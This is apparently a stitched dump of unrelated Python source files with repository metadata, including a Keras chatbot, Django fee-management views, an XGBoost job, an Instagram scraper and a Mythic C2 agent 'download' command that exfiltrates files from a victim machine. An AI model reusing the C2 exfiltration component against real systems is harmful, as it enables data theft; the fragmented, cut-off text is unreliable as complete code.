lemmatizer = WordNetLemmatizer()
import pickle
import numpy as np
from keras.models import load_model
model = load_model('chatbot_model.h5')  # trained Keras intent classifier
import json
import random
intents = json.loads(open('intents.json').read())
# NOTE(review): pickle.load executes arbitrary code from the file — only
# load words.pkl / classes.pkl from a trusted source.
words = pickle.load(open('words.pkl','rb'))
classes = pickle.load(open('classes.pkl','rb'))
def clean_up_sentence(sentence):
    """Tokenize `sentence` with nltk and lemmatize each token in lower case."""
    # tokenize the pattern - split words into array
    sentence_words = nltk.word_tokenize(sentence)
    # stem each word - create short form for word
    sentence_words = [lemmatizer.lemmatize(word.lower()) for word in sentence_words]
    return sentence_words
# return bag of words array: 0 or 1 for each word in the bag that exists in the sentence
def bow(sentence, words, show_details=True):
    """Return a numpy 0/1 vector marking which vocabulary `words` occur in `sentence`."""
    # tokenize the pattern
    sentence_words = clean_up_sentence(sentence)
    # bag of words - matrix of N words, vocabulary matrix
    bag = [0]*len(words)
    for s in sentence_words:
        for i,w in enumerate(words):
            if w == s:
                # assign 1 if current word is in the vocabulary position
                bag[i] = 1
                if show_details:
                    print ("found in bag: %s" % w)
    return(np.array(bag))
def predict_class(sentence, model):
    """Run the classifier on `sentence`; return intents above the 0.25
    threshold as [{'intent': tag, 'probability': str}, ...], best first."""
    # filter out predictions below a threshold
    p = bow(sentence, words,show_details=False)
    res = model.predict(np.array([p]))[0]
    ERROR_THRESHOLD = 0.25
    results = [[i,r] for i,r in enumerate(res) if r>ERROR_THRESHOLD]
    # sort by strength of probability
    results.sort(key=lambda x: x[1], reverse=True)
    return_list = []
    for r in results:
        return_list.append({"intent": classes[r[0]], "probability": str(r[1])})
    return return_list
def getResponse(ints, intents_json):
    """
    Pick a random canned response for the top predicted intent.

    `ints` is the ranked list from predict_class; `intents_json` is the
    parsed intents file. Raises UnboundLocalError when no tag matches
    (same as the original behaviour).
    """
    tag = ints[0]['intent']
    for entry in intents_json['intents']:
        if entry['tag'] == tag:
            result = random.choice(entry['responses'])
            break
    return result
def chatbot_response(text):
    """End-to-end reply: classify `text`, then pick a response for the top intent."""
    ints = predict_class(text, model)
    res = getResponse(ints, intents)
    return res
"noreply@github.com"
] | noreply@github.com |
d5cd66d641368250a2240e0b25b8c1617d333706 | 38d84678e520e80dc8251b6458ff832549e529b3 | /Sources/VAH/Time_calculator.py | 7ea7d7ebf6859d4a8557c58f002c20cb3cc986ca | [] | no_license | MickaelCalatr/VAH_Solution | bc544a7bed688cffa039c5c83e52ff82af0ba992 | 04fc09526a497766e4d393219bee8c1e8199ce59 | refs/heads/master | 2021-09-25T12:38:16.238310 | 2018-07-13T12:07:55 | 2018-07-13T12:07:55 | 124,483,545 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,075 | py | import time
import datetime
class Timer:
def __init__(self):
self.time_to_update = 5
self.fps = 0
self.old_frames = 0
self.start = time.time()
self.end = time.time()
self.update_f = time.time()
self.need_print = time.time()
def need_to_print(self):
update = self.end - self.need_print
if update > self.time_to_update:
self.need_print = self.end
return True
return False
def update(self):
self.end = time.time()
def timer(self, frames):
timer = int(self.end - self.start)
update = self.end - self.update_f
if update > 1:
self.fps = int((frames - self.old_frames) / update)
self.old_frames = frames
self.update_f = self.end
return str("Time: " + time.strftime("%H:%M:%S", time.gmtime(timer)) + " \t Fps: " + str(self.fps))
def get_times(self):
self.update()
timer = int(self.end - self.start)
return time.strftime("%H:%M:%S", time.gmtime(timer))
| [
"mickael.calatraba@epitech.eu"
] | mickael.calatraba@epitech.eu |
be490d67d8abd9e56665d7b6ef9536c0352d1325 | fd62d8096dc95923341cfac29f0209bfbea887b4 | /models_evaluation/xgboost/grid_search/jobs_test/5.0_0.03_0.0_200.0_10.0.job.py | 9abbc493eabf624713f7efad4e08eff3f17a4fed | [] | no_license | Eulerianial/premise-selection-deepmath-style | 06c8f2f540bc7e3840c6db0a66c5b30b5f4257f9 | 8684a59b5d8beab1d02a3a7c568a16c790ea4b45 | refs/heads/master | 2021-07-17T17:04:13.472687 | 2017-10-25T13:54:44 | 2017-10-25T13:54:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,637 | py | import xgboost as xgb
import argparse
import sys
import os
from saving_loading import *
#####################################
p = {
"max_depth":int(5.0),
"eta":0.03,
"gamma":0.0,
"num_boost_round":int(200.0),
"early_stopping_rounds":int(10.0)
}
#####################################
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Run CV for xgboost with particular combination of parameters')
parser.add_argument("X",
help = "path to CSR matrix with features of pairs (theorem, premise)")
parser.add_argument("y",
help = "path to CSV file with labels reflecting relevances of pairs (theorem, premise)")
parser.add_argument("output_directory",
help = "path to directory where performance of tested model should be saved")
args = parser.parse_args()
y = read_csv(os.path.abspath(args.y), type_of_records = "int")
X = load_obj(os.path.abspath(args.X))
output_directory = os.path.abspath(args.output_directory)
dtrain = xgb.DMatrix(X, label = y)
params = {
"max_depth":p["max_depth"],
"eta":p["eta"],
"gamma":p["gamma"],
"objective":"binary:logistic"
}
x = xgb.cv(
params = params,
dtrain = dtrain,
num_boost_round = p["num_boost_round"],
early_stopping_rounds = p["early_stopping_rounds"],
nfold = 4,
metrics = {"error","auc","logloss"}
)
output_name = os.path.join(output_directory, "_".join(map(str, list(p.values())))+".pkl")
save_obj({"params":p, "stats":x}, output_name)
| [
"bartoszpiotrowski@post.pl"
] | bartoszpiotrowski@post.pl |
901dcc3900ecf9cac23ac0fed23c343981062771 | 9ccc00f0cf01fe9888b8c151da900a5e64043cd9 | /final/views.py | 5a1ab4f8e41f5d1094a0c4ab5cf9a2bf1a805211 | [] | no_license | Frdhsn/feems | f7ebce1faee4bcab4877dca6d6e59529adbe6bf3 | 950ad3ff09ae09f6ad61d5997fa2220f694a0214 | refs/heads/master | 2023-01-21T19:51:11.332192 | 2020-11-29T16:45:22 | 2020-11-29T16:45:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,653 | py | from django.contrib.auth.decorators import login_required
from .filters import StudentFilter
from .decorator import exists_student, unauthorizeduser
from .models import Student, Semister_Fee, Semister
from django.shortcuts import render, redirect
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth import authenticate, login as dj_login, logout
from django.contrib import messages
from .form import StudentForm, SemisterForm, StaffForm, UpdateStudentByTeacher, UpdateStudentByRegister, UpdateStudentPaymentByRegister
from django.shortcuts import get_object_or_404
# Create your views here.
@login_required(login_url='final:signin')
def homepage(request):
return render(request, 'final/homepage.html')
@unauthorizeduser
def signup(request):
if request.method == "POST":
form = UserCreationForm(request.POST)
if form.is_valid():
form.save()
username = form.cleaned_data.get('username')
password = form.cleaned_data.get('password1')
messages.info(request, f"{username} signup completed")
user = authenticate(username=username, password=password)
dj_login(request, user)
return redirect("final:homepage")
else:
form = UserCreationForm()
cont = {
'form': form
}
return render(request, 'final/signup.html', cont)
@exists_student
def studentform(request):
if request.method == "POST":
form = StudentForm(request.POST)
if form.is_valid():
form = form.save(commit=False)
form.user = request.user
form.save()
messages.info(
request, f"Your Student Verify form submitted Successfully")
return redirect("final:student_verify")
else:
form = StudentForm()
return render(request, 'final/student_form.html', {"form": form})
def student_verify_alert(request):
student = Student.objects.get(user=request.user)
permission = student.is_student
return render(request, 'final/student_verify.html', {"permission": permission})
def semister_form(request):
if request.method == "POST":
form = SemisterForm(request.POST)
if form.is_valid():
form = form.save(commit=False)
form.student = Student.objects.get(user=request.user)
form.save()
return redirect('final:attendence_verify', semister_no=form.semister)
else:
form = SemisterForm()
cont = {
'form': form
}
return render(request, 'final/semister_form.html', cont)
def attendence_verify(request, semister_no):
student = Student.objects.get(user=request.user)
student_semister = Semister.objects.filter(
student=student, semister=semister_no).first()
student_attendence = student_semister.have_attendence
return render(request, 'final/attendence_verify.html', {"permission": student_attendence})
def payment_form(request):
student = Student.objects.get(user=request.user)
semister = Semister.objects.filter(student=student).last().semister
if request.method == "POST":
admission_fee = request.POST.get("admission_fee")
session_charge = request.POST.get("session_charge")
exam_fee = request.POST.get("exam_fee")
hall_fee = request.POST.get("hall_fee")
library_fee = request.POST.get("library_fee")
transport_fee = request.POST.get("transport_fee")
medical_fee = request.POST.get("medical_fee")
form = Semister_Fee(student=student,
semister=semister,
admission_fee=admission_fee,
session_charge=session_charge,
exam_fee=exam_fee,
hall_fee=hall_fee,
library_fee=library_fee,
transport_fee=transport_fee,
medical_fee=medical_fee)
form.save()
messages.info(request, f"Your Payment Is completed")
return redirect("final:payment_verify")
return render(request, 'final/payment_form.html')
def payment_verify(request):
payment = Semister_Fee.objects.filter(
student=request.user.student_user).last()
permission = payment.is_register_verify
cont = {
'permission': permission
}
return render(request, 'final/payment_verify.html', cont)
def student_semister_fee(request, student_id):
student = Student.objects.get(id=student_id)
student_semister_fee = Semister_Fee.objects.filter(student=student)
cont = {
'student_semister_fee': student_semister_fee
}
return render(request, 'final/student_semister_fee.html', cont)
def staffform(request):
form = StaffForm()
if request.method == 'POST':
form = StaffForm(request.POST)
if form.is_valid():
dept = form.cleaned_data.get("department")
role = form.cleaned_data.get("Role")
print(role)
if role == "Teacher":
return redirect('final:teacher_students', dept=dept)
else:
return redirect('final:register_students')
return render(request, 'final/staff_form.html', {'form': form})
def teacher_students(request, dept):
students = Student.objects.filter(dept=dept)
myfilter = StudentFilter(request.GET, students)
students = myfilter.qs
cont = {
'students': students,
'myfilter': myfilter
}
return render(request, 'final/teacher_student.html', cont)
def register_students(request):
students = Student.objects.all()
myfilter = StudentFilter(request.GET, students)
students = myfilter.qs
cont = {
'students': students,
'myfilter': myfilter
}
return render(request, 'final/register_students.html', cont)
def update_student_by_teacher(request, semister_no, student_id):
student = Student.objects.get(id=student_id)
semister_for_student = Semister.objects.filter(
student=student, semister=semister_no).first()
if request.method == "POST":
form = UpdateStudentByTeacher(
request.POST, instance=semister_for_student)
if form.is_valid():
form.save()
messages.info(request, f"Student Info Updated")
return redirect('final:teacher_students', student.dept)
else:
form = UpdateStudentByTeacher(instance=semister_for_student)
cont = {
'form': form
}
return render(request, 'final/update_student_by_teacher.html', cont)
def update_student_by_register(request, student_id):
student = Student.objects.get(pk=student_id)
if request.method == "POST":
form = UpdateStudentByRegister(request.POST, instance=student)
if form.is_valid():
form.save()
messages.info(
request, f"The student's identity is validate by Register office!")
return redirect('final:register_students')
else:
form = UpdateStudentByRegister(instance=student)
return render(request, 'final/update_student_by_register.html', {"form": form})
def update_student_payment_by_register(request, student_id, semister_id):
student = Student.objects.get(pk=student_id)
semister_fee = Semister_Fee.objects.filter(
student=student, semister=semister_id).first()
if request.method == "POST":
form = UpdateStudentPaymentByRegister(
request.POST, instance=semister_fee)
if form.is_valid():
form.save()
messages.info(
request, f"The student's payment update completed by Register office!")
return redirect('final:student_semister_fee', student_id)
else:
form = UpdateStudentPaymentByRegister(instance=semister_fee)
return render(request, 'final/update_student_payment_by_register.html', {"form": form})
def profile_page(request):
student = Student.objects.filter(user=request.user)
student_fee = []
if student:
student_fee = Semister_Fee.objects.filter(student=student[0])
cont = {
'student_fee': student_fee
}
return render(request, 'final/profile_page.html', cont)
def preview_fee(request, student_id, semister_num):
student = Student.objects.get(pk=student_id)
student_fee = Semister_Fee.objects.filter(
student=student, semister=semister_num)
print(student_fee)
cont = {
'student_fee': student_fee,
'student_id': student_id
}
return render(request, 'final/preview_fee.html', cont)
| [
"ashikex49@gmail.com"
] | ashikex49@gmail.com |
664776c6b1ed20de8546b76616085ccde59c6ff5 | 0abef26a612ddfad627000e3280f310a978e8d04 | /node-ffi demo/build/config.gypi | 9157e1b1abfc0ed473fc84e6a81b2e523950b219 | [] | no_license | AugustRush/2017demo | 98fef3954c325029e65ac48fd29f778869a62af6 | 79070ea13fd9813fb0904511ef89c8f01ff86ef6 | refs/heads/master | 2021-01-20T12:51:52.335872 | 2017-09-21T06:59:58 | 2017-09-21T06:59:58 | 101,727,546 | 5 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,968 | gypi | # Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"coverage": "false",
"debug_devtools": "node",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_data_file": "icudt58l.dat",
"icu_data_in": "../../deps/icu-small/source/data/in/icudt58l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps/icu-small",
"icu_small": "true",
"icu_ver_major": "58",
"llvm_version": 0,
"node_byteorder": "little",
"node_enable_d8": "false",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_module_version": 48,
"node_no_browser_globals": "false",
"node_prefix": "/usr/local",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_bundled_v8": "true",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_v8_platform": "true",
"openssl_fips": "",
"openssl_no_asm": 0,
"shlib_suffix": "48.dylib",
"target_arch": "x64",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "true",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_inspector": "true",
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_random_seed": 0,
"v8_use_snapshot": "false",
"want_separate_host_toolset": 0,
"xcode_version": "7.0",
"nodedir": "/Users/baidu/.node-gyp/6.11.1",
"standalone_static_library": 1
}
}
| [
"liupingwei30@gmail.com"
] | liupingwei30@gmail.com |
852f5bf1d22e53bc8195742775a96253742e89ed | 428b0c174d532f362af755164c01d517c5d28eff | /backend/manage.py | 8b76f37a158a57a733ccc8d742f26e9451df73f1 | [] | no_license | crowdbotics-apps/envy-budget-4817 | e861af5ce1631efffd15ee56fcedc7554427976f | 6e4eab96e9786db16e403844be0e22c92f085a62 | refs/heads/master | 2023-01-05T01:03:04.949154 | 2019-06-18T03:33:41 | 2019-06-18T03:33:41 | 192,458,782 | 0 | 0 | null | 2022-12-30T10:31:26 | 2019-06-18T03:30:29 | Python | UTF-8 | Python | false | false | 636 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Entry point for Django's administrative command line.

    Points Django at this project's settings module and hands control to
    the management command dispatcher.
    """
    # Only set the settings module if the environment has not chosen one.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'envy_budget_4817.settings')
    try:
        from django.core.management import execute_from_command_line as run_cli
    except ImportError as exc:
        message = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(message) from exc
    run_cli(sys.argv)
if __name__ == '__main__':
main()
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
276afbc6983319b0eda3c7d14b946c896e905bd4 | cdc76a728f157b3719c3e06eeb1dc8a1ff87556b | /gatePassApp/admin.py | 6e0a3fdc198bc3e6948f1fa19cbf2dc002a524af | [] | no_license | shubhamk-code/gate-pass | d9cdd8b23edec01374c5d8ae2144ee7701db9d73 | f8c1699fb4c3ce810353d15b5920d98e3ac589cc | refs/heads/main | 2023-07-28T08:02:13.999919 | 2021-09-13T16:21:52 | 2021-09-13T16:21:52 | 406,041,078 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,404 | py | from django.contrib import admin
from .models import *
# Register your models here.
# admin.site.register(Admin)
# admin.site.register(Visitor)
# admin.site.register(DepartmentStaff)
# admin.site.register(Staff)
admin.site.register(Department)
# admin.site.register(Pass)
# admin.site.register(Venue)
# admin.site.register(Event)
# admin.site.register(Contractor)
@admin.register(Venue)
class VenueAdmin(admin.ModelAdmin):
    """Admin change-list configuration for Venue records."""
    list_display = ('name', 'phone', 'address')  # columns shown in the list view
    ordering = ('name',)  # default sort order
    search_fields = ('name', 'address')  # fields queried by the admin search box
@admin.register(Event)
class EventData(admin.ModelAdmin):
    """Admin change-list configuration for Event records."""
    list_display = ('name', 'event_date', 'manager', )  # columns shown in the list view
    ordering = ('name',)  # default sort order
    search_fields = ('name', 'manager')  # fields queried by the admin search box
@admin.register(Contractor)
class ContractorData(admin.ModelAdmin):
    """Admin change-list configuration for Contractor records."""
    list_display = ('name', 'email', 'contact', 'company', 'contractual')  # list-view columns
    ordering = ('name',)  # default sort order
    search_fields = ('name', 'company')  # fields queried by the admin search box
@admin.register(Staff)
class StaffData(admin.ModelAdmin):
    """Admin change-list configuration for Staff records."""
    list_display = ( 'name', 'email', 'contact', 'age', 'gender', 'department')  # list-view columns
    ordering = ('name',)  # default sort order
    search_fields = ('name', 'department', 'contact')  # fields queried by the admin search box
@admin.register(Visitor)
class VisitorData(admin.ModelAdmin):
    """Admin change-list configuration for Visitor records."""
    list_display = ( 'name', 'email', 'contact',
                    'age', 'gender', 'department', 'status')  # list-view columns
    ordering = ('name',)  # default sort order
    search_fields = ('name', 'contact', 'status', 'gender')  # fields queried by the admin search box
| [
"shbhmkawthekar@gmail.com"
] | shbhmkawthekar@gmail.com |
379ca12fa2e8516b086afc15db4f34106d160071 | 2c8f76ee2579a068cb471cf32447f0fa334b84d8 | /Files and Exceptions/Exercises/Silent_Cats_and_Dogs.py | 9b1fc7a6592c4d066d4c218eb3dc8a9b19ba6d51 | [] | no_license | Ahsank01/Python-Crash-Course | 03386b4273aa66a655cc0f5f31b1994bd461f46b | 1ce40c51cf2c6dc96cecb309e23b948873edb4b4 | refs/heads/master | 2023-01-08T02:26:36.017259 | 2020-11-04T18:02:09 | 2020-11-04T18:02:09 | 295,860,595 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 385 | py | # Name: Ahsan Khan
# Date: 11/02/20
# Description: Modify the except block from Cats_and_Dogs.py to fail silently if eithrt file is missing
def readFiles(filename):
    """Print the full contents of *filename*; do nothing if it is missing.

    The silent failure on a missing file is intentional (the point of the
    exercise this script solves).
    """
    try:
        handle = open(filename)
    except FileNotFoundError:
        # Fail silently when the file does not exist.
        return
    with handle:
        print(handle.read())
# Try to print each file; 'elephant.txt' is expected to be absent and
# should be skipped silently by readFiles.
filename = ['cats.txt', 'dogs.txt', 'elephant.txt']
for files in filename:
    readFiles(files)
    print()  # blank line between files
"noreply@github.com"
] | noreply@github.com |
6f24935a86a3a6d703e5fa10ad21e8541f62a478 | 0dc9c24f70a0e7649c9936b49466c69a7ae9e1d4 | /InstagramImage.py | 914ad7890e6dbca6fcb9b4bf96bd2991e06e9d95 | [] | no_license | Code-0x00/webImagesCrawler | 1d16183f910f10a11ca67f3b199448f4db65ecb3 | 239d8cb20648ec5e4a9b8941898a59b8f04a9516 | refs/heads/master | 2021-05-10T11:43:12.382798 | 2018-01-29T02:06:12 | 2018-01-29T02:06:12 | 118,418,463 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,280 | py | #coding:utf-8
import urllib2
import re
from selenium import webdriver
import time
import SqlDB
class InstagramImage:
    """Scrapes image URLs from Instagram tag pages via a Selenium Firefox
    driver and optionally stores them through a SqlDB helper.

    NOTE(review): this is Python 2 code (print statements, unicode()).
    """
    def __str__(self):
        return 'InstagramImage'
    __repr__ = __str__
    def __init__(self, mSqlDB = 0, mProxy = None):
        """Remember the DB helper and proxy; detect whether mSqlDB is usable.

        :param mSqlDB: a SqlDB.SqlDB instance, or 0 to disable DB storage
        :param mProxy: optional Selenium proxy configuration
        """
        print 'InstagramImage----in----'
        self.mSqlDB = mSqlDB
        self.isUsingSqlDB = False
        self.mProxy = mProxy
        # Crude type check: compares metaclasses, so any class instance
        # passes — presumably intended as isinstance(mSqlDB, SqlDB.SqlDB).
        if type(mSqlDB.__class__) is type(SqlDB.SqlDB):
            self.isUsingSqlDB = True
            print 'using sqlDB'
        else:
            print 'can not use sqlDB'
        #print 'the type of mSqlDB:' + str(mSqlDB.__class__)
        print 'InstagramImage----out----'
    def insertDB(self, url, keywords):
        """Store one image *url* with its *keywords* via the SqlDB helper,
        if one was provided at construction time."""
        print 'InstagramImage----insertDB----in----'
        if self.isUsingSqlDB:
            print 'using sqlDB'
            #print 'engine:' + self.__str__()
            self.mSqlDB.insert(url, self.__str__(), keywords)
        else:
            print 'can not use sqlDB'
        print 'InstagramImage----insertDB----out----'
    def fetch(self, keywords):
        """Crawl up to 100 pages of the Instagram tag *keywords*, extracting
        display_src image URLs from the page source and inserting each into
        the database. Pagination uses the last id of every 12-image page."""
        print 'InstagramImage----fetch----in----'
        driver = webdriver.Firefox(proxy=self.mProxy)
        max_id = '0'
        for page_num in range(100):
            Page_num = page_num
            # First page has no max_id cursor; later pages paginate with it.
            if max_id == '0':
                searchUrl = 'https://www.instagram.com/explore/tags/' + keywords
            else:
                searchUrl = 'https://www.instagram.com/explore/tags/' + keywords + '?max_id='+str(max_id)
            print searchUrl
            driver.get(searchUrl)
            driver.implicitly_wait(5)
            content=driver.page_source.encode("utf-8")
            # Pairs of "id" and "display_src" fields embedded in the page JSON.
            urls=re.findall('"id":"[^"]*","display_src":"[^"]*"',content,re.I)
            count = 0
            for i in urls:
                display_id = re.findall('"id":"[^"]*"', i, re.I)[0]
                display_src = re.findall('"display_src":"[^"]*"', i, re.I)[0]
                # Strip the field down to the bare quoted value.
                real_id = re.findall('"[^"]*"$',display_id,re.I)[0].split('"')[1].strip()
                real_src = re.findall('"[^"]*"$',display_src,re.I)[0].split('"')[1].strip()
                url = real_src.replace('\\', '')  # un-escape JSON backslashes
                print url
                count = count + 1
                #print "count=" + str(count)
                self.insertDB(url, unicode(keywords, "utf-8"))
                # 12 images per page; remember the last id as the next cursor.
                if count == 12:
                    max_id = real_id
                    print
                    break
        driver.close()
        print 'InstagramImage----fetch----out----'
if __name__=="__main__":
print 'InstagramImage----main----in----'
instagramImage = InstagramImage()
instagramImage.fetch('Abyssinian')
print 'InstagramImage----main----out----'
| [
"yohoho233@gmail.com"
] | yohoho233@gmail.com |
ef9173cfa8a6c3ee550b53d9ab4739412550077e | 567b880347a4ace3a64060753bf9bfadb42fb242 | /demo/app.py | e158c660ac3904f01488022ac78189149d5840be | [] | no_license | land-pack/intuition | 7b8335a8c0a07975c862d8e0daaa1f814bd9f63b | bc0a4e847ebe2b4c80c18d6a7e6e16a828c2a712 | refs/heads/master | 2020-03-23T07:03:36.530012 | 2018-07-18T06:26:09 | 2018-07-18T06:26:09 | 141,245,462 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 414 | py | import requests
from flask import Flask, render_template
app = Flask(__name__)
@app.route("/")
def index():
r = requests.get('http://127.0.0.1:5001/api/preview')
data = r.json()
images = data.get('images')
return render_template('index.html', images=images)
@app.route("/upload")
def upload():
return render_template('upload.html')
if __name__ == '__main__':
app.run(debug=True)
| [
"landpack@sina.com"
] | landpack@sina.com |
5a37f7eb85b6bd929fabe005a19a2a43d41f15d5 | da5bc6efaebc9ff015938d207b25c7804bc03b33 | /11_class/quiz03/quiz03.py | 58c5273addfe4332aba0c15c597067916327331e | [] | no_license | codud0954/megait_python_20201116 | b0f68f50a1e0d41c3c35535e718d5a236a7b1a98 | a71f57d4332027406953599612cd014de2d26713 | refs/heads/master | 2023-01-31T11:14:27.611468 | 2020-12-18T09:03:11 | 2020-12-18T09:03:11 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,127 | py | # 제품관리 설계도
class Product:
# 생성자
def __init__(self, name, price, expired_date):
self.name = name
self.price = price
self.expired_date = expired_date
# 제품 정보
def product_info(self):
print("이름:", self.name)
print("가격:", self.price)
print("유통기한", self.expired_date)
# 제품 n개의 가격
def price_of_product(self, count):
return count * self.price
# 판매 가능 여부
def sale_status(self):
# 오늘 날짜 <= 유통기한 날짜 : 판매 가능 상품
# 오늘 날짜 > 유통기한 날짜 : 판매 불가 상품
today = "2020-12-14"
if today <= self.expired_date:
return "판매 가능 상품"
else:
return "판매 불가 상품"
# Create a sample product and exercise each of its methods.
shrimp = Product("새우깡", 1300, "2021-03-01")
shrimp.product_info()
print()
print("제품 5개의 가격 : %d" % shrimp.price_of_product(5))
print("제품 13개의 가격 : %d" % shrimp.price_of_product(13))
print(shrimp.sale_status())
| [
"noreply@github.com"
] | noreply@github.com |
fc07856387a10a3a8dbed500fe7a51d73eaeb050 | e59273ecf45ddc40af8f51607e3ca1fb46632bb1 | /Payload_Types/apfell/mythic/agent_functions/download.py | fcfff9bf3b21b6ee4794053ec13673c5fa3ac9f6 | [
"BSD-3-Clause",
"MIT"
] | permissive | thiagomayllart/Mythic | 62ae01a42027ac1a71564775c8cc7ac8d0e88aa4 | bb1a90fb3c3e37c284fc812548b8f7ae5ffc1fb1 | refs/heads/master | 2023-06-02T08:12:09.099400 | 2021-06-19T23:30:26 | 2021-06-19T23:30:26 | 326,127,766 | 0 | 1 | NOASSERTION | 2021-06-20T03:20:21 | 2021-01-02T06:59:04 | Python | UTF-8 | Python | false | false | 1,829 | py | from CommandBase import *
import json
from MythicResponseRPC import *
class DownloadArguments(TaskArguments):
    """Argument container for the apfell download command."""

    def __init__(self, command_line):
        super().__init__(command_line)
        self.args = {}

    async def parse_arguments(self):
        """Normalise JSON tasking from the file browser into a plain path."""
        if not self.command_line:
            return
        if not self.command_line.startswith("{"):
            return
        parsed = json.loads(self.command_line)
        if "host" not in parsed:
            raise Exception("Unsupported JSON")
        # File-browser tasking: the apfell agent cannot do remote listings,
        # so the host field is ignored and path/file are joined into one string.
        self.command_line = parsed["path"] + "/" + parsed["file"]
class DownloadCommand(CommandBase):
    """Mythic command definition for downloading a file from the victim
    machine to the Mythic server in chunks."""
    cmd = "download"
    needs_admin = False
    help_cmd = "download {path to remote file}"
    description = "Download a file from the victim machine to the Mythic server in chunks (no need for quotes in the path)."
    version = 1
    is_exit = False
    is_file_browse = False
    is_process_list = False
    is_download_file = True  # marks this as the agent's download command
    is_remove_file = False
    is_upload_file = False
    author = "@its_a_feature_"
    parameters = []  # path is taken from the raw command line, not named params
    attackmapping = ["T1020", "T1030", "T1041"]  # MITRE ATT&CK technique ids
    argument_class = DownloadArguments
    browser_script = BrowserScript(script_name="download", author="@its_a_feature_")
    async def create_tasking(self, task: MythicTask) -> MythicTask:
        """Register the ObjC API calls the agent will make as an artifact."""
        resp = await MythicResponseRPC(task).register_artifact(
            artifact_instance="$.NSFileHandle.fileHandleForReadingAtPath, readDataOfLength",
            artifact_type="API Called",
        )
        return task
    async def process_response(self, response: AgentResponse):
        """No post-processing needed for agent responses."""
        pass
| [
"codybthomas@gmail.com"
] | codybthomas@gmail.com |
e7c91c20ea5c73db595cd634da092ff3cd4b3fde | 4fa80f69e64d2ed2285b10e47125bcf78487e75e | /w3/testEngine.py | c2bba189fb8263a9de751fa44e23b75a40a70dd8 | [] | no_license | wli21/found18 | 89edd70c8b9e1aff9801d674b96710130dc70ee8 | 397f5dccf9d76e9801a9354f586b1468617f6208 | refs/heads/master | 2020-03-26T17:17:29.432000 | 2018-12-09T21:14:48 | 2018-12-09T21:14:48 | 145,153,376 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 484 | py |
import re,traceback
class O:
    """Tiny test harness: run functions through O.k and tally pass/fail."""
    y = n = 0  # pass / fail counters shared by every test in the run

    @staticmethod
    def report():
        """Print the pass/fail totals and the overall pass percentage."""
        total = O.y + O.n + 0.001  # +0.001 guards against division by zero
        percent = int(round(O.y * 100 / total))
        print("\n# pass= %s fail= %s %%pass = %s%%" % (O.y, O.n, percent))

    @staticmethod
    def k(f):
        """Run *f* as a test: print a banner and its docstring, then record
        pass (no exception) or fail (any exception, traceback printed).
        Returns *f* so it can be used as a decorator."""
        try:
            print("\n-----| %s |-----------------------" % f.__name__)
            doc = f.__doc__
            if doc:
                print("# "+ re.sub(r'\n[ \t]*',"\n# ",doc))
            f()
            print("# pass")
            O.y += 1
        except:
            O.n += 1
            print(traceback.format_exc())
        return f
"wli21@ncsu.edu"
] | wli21@ncsu.edu |
e8f6627e5ca6c6c236f176ab86c0fa1405ddd68d | 691d3f3e04d354e11772335064f33245e1ed8c28 | /lib/galaxy/tools/test.py | ec7c7c7d1a8913c9ba7ecbcc555ce0d7d27eba56 | [
"CC-BY-2.5",
"MIT"
] | permissive | dbcls/dbcls-galaxy | 934a27cc13663549d5208158fc0b2821609399a8 | 6142165ef27f6a02aee42f26e0b94fed67ecc896 | refs/heads/master | 2016-09-05T22:53:27.553419 | 2009-09-09T06:35:28 | 2009-09-09T06:35:28 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,997 | py | import new, sys
import galaxy.util
import parameters
from parameters import basic
from parameters import grouping
from elementtree.ElementTree import XML
class ToolTestBuilder( object ):
    """
    Encapsulates information about a tool test, and allows creation of a
    dynamic TestCase class (the unittest framework is very class oriented,
    doing dynamic tests in this was allows better integration)
    """
    def __init__( self, tool, name ):
        # Tool under test and the test's display name.
        self.tool = tool
        self.name = name
        self.required_files = []  # (value, extra) pairs for data inputs the test needs
        self.inputs = []          # (name, value, extra) triples for all test params
        self.outputs = []         # (name, file) pairs of expected outputs
        self.error = False
        self.exception = None
    def add_param( self, name, value, extra ):
        """Record a test parameter; if it maps to a data input (possibly
        nested inside a Conditional/Repeat group), also record the file it
        requires."""
        # NOTE(review): the bare except deliberately swallows *all* lookup
        # errors so an unknown param is still appended below — but it also
        # hides genuine bugs (and catches KeyboardInterrupt).
        try:
            if name not in self.tool.inputs:
                # Param not at top level: search grouped inputs for a match.
                for input_name, input_value in self.tool.inputs.items():
                    if isinstance( input_value, grouping.Conditional ) or isinstance( input_value, grouping.Repeat ):
